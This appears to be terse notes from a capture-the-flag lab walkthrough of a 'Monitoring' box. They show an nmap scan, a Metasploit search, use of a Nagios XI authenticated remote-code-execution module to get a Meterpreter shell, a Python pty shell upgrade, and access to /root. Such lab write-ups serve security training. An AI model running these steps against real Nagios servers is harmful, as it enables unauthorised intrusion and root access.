Monitoring
RECON
Ip Search
Investigating the IP shows Nagios XI
Login Page
Nmap Scan
nmap -sC -sV -A 192.168.54.136
-safe scripts -service version -OS /version detection
Exploit Search
msfconsole
search nagios
Service Version
Provided Exploits did not work but reveals the service version
Google-Fu
Nagios XI Remote Code Execution
Exploit allows for root access prior to 5.6.6
ENUMURATION
Exploit
use exploit /linux/http/nagios_xi_autheticated_rce
Reveales it had been moved
Set Options and Run
Provides Meterpreter Shell
Privilege/Root Escalation
Switch to TTY Shell
shell
python -c ‘import pty;pty.spawn(“/bin/bash”)’
Root Flag
cd /root